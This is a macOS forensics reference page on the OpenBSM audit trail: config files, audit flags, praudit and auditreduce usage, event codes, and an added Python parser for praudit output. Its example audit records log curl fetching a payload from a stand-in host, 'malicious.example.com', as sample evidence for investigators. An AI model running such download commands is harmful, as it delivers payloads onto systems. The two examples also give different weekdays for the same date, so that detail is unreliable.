System

Audit Trail (BSM)

Overview

macOS includes OpenBSM (Basic Security Module), a kernel-level auditing framework that records security-relevant events including process execution, file access, authentication, and permission changes. When enabled, BSM audit logs provide the most detailed system activity records available on macOS, surpassing even Unified Logs for certain event types.

BSM auditing is not enabled by default on macOS but is commonly activated in enterprise and high-security environments. When present, audit logs are an extremely valuable forensic artifact.

Forensic Significance

| Evidence Type | Forensic Value |
| --- | --- |
| Process execution | Every program launched with full path and arguments |
| File access | File open, read, write, delete events |
| Authentication | Login, logout, su, sudo events with success/failure |
| Permission changes | File permission and ownership modifications |
| Network connections | Socket operations and network access |
| User attribution | Every event tied to a specific UID/EUID |

File Locations

| Artifact | Path | Format |
| --- | --- | --- |
| Audit logs | /var/audit/* | BSM binary |
| Current audit trail | /var/audit/current | BSM binary (active) |
| Audit control config | /etc/security/audit_control | Text |
| Audit event definitions | /etc/security/audit_event | Text |
| Audit user config | /etc/security/audit_user | Text |

Audit log files are named with timestamps: YYYYMMDDHHMMSS.YYYYMMDDHHMMSS (start time to end time). The trail still being written carries the suffix .not_terminated in place of the end time, and /var/audit/current is a symlink to it.

Configuration

audit_control

dir:/var/audit
flags:lo,aa,ex,fc,fd,fw,fm
minfree:5
naflags:lo,aa
policy:cnt,argv,arge
filesz:2M
expire-after:10M

Key flags:

| Flag | Description |
| --- | --- |
| lo | Login/logout |
| aa | Authentication and authorization |
| ex | Program execution |
| fc | File creation |
| fd | File deletion |
| fw | File write |
| fm | File attribute modification |
| fr | File read |
| nt | Network events |

Key Fields for Analysis

Reading Audit Logs

# Convert BSM binary to human-readable text
praudit /var/audit/20260219120000.20260219180000

# Search for specific events
praudit /var/audit/* | grep "execve"

# XML output for parsing
praudit -x /var/audit/20260219120000.20260219180000

# Filter by event type
auditreduce -m AUE_EXECVE /var/audit/* | praudit

Common Event Types

| Event | Code | Description |
| --- | --- | --- |
| AUE_EXECVE | 23 | Process execution |
| AUE_OPEN_R | 72 | File open for reading |
| AUE_OPEN_W | 73 | File open for writing |
| AUE_UNLINK | 10 | File deletion |
| AUE_RENAME | 128 | File rename |
| AUE_CONNECT | 62 | Network connection |
| AUE_AUTH | 45023 | Authentication event |
| AUE_sudo | 45042 | sudo execution |
| AUE_ssh | 45029 | SSH connection |

Example Output (praudit)

header,116,11,execve(2),0,Mon Feb 19 14:30:45 2026, + 123 msec
path,/usr/bin/curl
attribute,100755,root,wheel,16777220,1234,0
exec arg,curl
exec arg,-o
exec arg,/tmp/payload.bin
exec arg,https://malicious.example.com/payload
subject,toby,toby,staff,toby,staff,1234,5678,0,192.168.1.100
return,success,0
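As an added example (not part of this page or the macfor project), the following Python script parses praudit's default text output, such as the record above, into one dictionary per header..trailer record and emits a triage line per execve event, including failed executions. The two sample records are constructed, and the field positions assumed for the header and subject tokens follow praudit's default layout.

```python
# Constructed sample in praudit's default text format (not real audit data):
# one successful curl execve and one failed sudo execve, each header..trailer.
SAMPLE = """\
header,116,11,execve(2),0,Thu Feb 19 14:30:45 2026, + 123 msec
path,/usr/bin/curl
exec arg,curl
exec arg,-o
exec arg,/tmp/payload.bin
exec arg,https://malicious.example.com/payload
subject,toby,toby,staff,toby,staff,1234,5678,0,192.168.1.100
return,success,0
trailer,116
header,98,11,execve(2),0,Thu Feb 19 14:31:02 2026, + 7 msec
path,/usr/bin/sudo
exec arg,sudo
subject,toby,toby,staff,toby,staff,1300,5678,0,192.168.1.100
return,failure : Permission denied,13
trailer,98
"""
SUBJECT_FIELDS = ("auid", "euid", "egid", "ruid", "rgid", "pid", "sid", "port", "addr")

def parse_praudit(text: str) -> list[dict]:
    """Group praudit token lines into one dict per header..trailer record."""
    records, rec = [], {"args": []}          # scratch dict absorbs stray pre-header lines
    for line in text.splitlines():
        tok, _, rest = line.partition(",")
        if tok == "header":                      # header,len,ver,event,mod,time, + N msec
            f = rest.split(",")
            rec = {"event": f[2], "time": f[4].strip(), "args": [], "ok": None}
        elif tok == "path":
            rec["path"] = rest
        elif tok == "exec arg":                  # one arg per line here; praudit may
            rec["args"].extend(rest.split(","))  # also pack several on one line
        elif tok == "subject":                   # auid,euid,egid,ruid,rgid,pid,sid,port,addr
            rec.update(zip(SUBJECT_FIELDS, rest.split(",")))
        elif tok == "return":                    # "success,0" or "failure : <msg>,<errno>"
            rec["ok"] = rest.startswith("success")
            rec["errno"] = rest.rsplit(",", 1)[1]
        elif tok == "trailer":                   # record complete
            records.append(rec)
    return records

def execve_lines(text: str) -> list[str]:
    """One triage line per execve record: time, audit-uid->euid, pid, result, path, argv."""
    out = []
    for r in parse_praudit(text):
        if r["event"] == "execve(2)":
            result = "ok" if r["ok"] else "FAIL errno=%s" % r.get("errno", "?")
            out.append(f'{r["time"]} {r["auid"]}->{r["euid"]} pid={r["pid"]} {result} {r.get("path", "?")} argv={r["args"]!r}')
    return out
```

On a live system, pass the text of `praudit /var/audit/*` to execve_lines() instead of SAMPLE; the audit UID (auid) survives su/sudo, so it is the field to pivot on for attribution.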

Analysis Notes

  • Not enabled by default: BSM auditing must be explicitly enabled (sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.auditd.plist). Check audit_control to determine the configuration.
  • Process execution evidence: When ex (execution) auditing is enabled, every process launch is recorded with full path and command-line arguments. This is the most comprehensive execution evidence available on macOS.
  • File access tracking: With fr/fw/fc/fd flags, BSM records which files were accessed, by whom, and when. This is invaluable for data exfiltration investigations.
  • Log rotation: Audit logs rotate based on size (filesz) and expiration (expire-after). Check the configuration to understand retention.
  • Binary format: BSM logs are binary and require praudit or auditreduce to read. The -x flag produces XML output suitable for automated parsing.
  • Enterprise environments: BSM auditing is common in SOC 2 and HIPAA-compliant environments. Its presence indicates a security-conscious organisation.

Tool Support

| Tool | Support |
| --- | --- |
| macfor | Not yet implemented (planned) |
| praudit (macOS built-in) | Convert BSM binary to text/XML |
| auditreduce (macOS built-in) | Filter and select audit records |
| OpenBSM | Open-source BSM implementation |
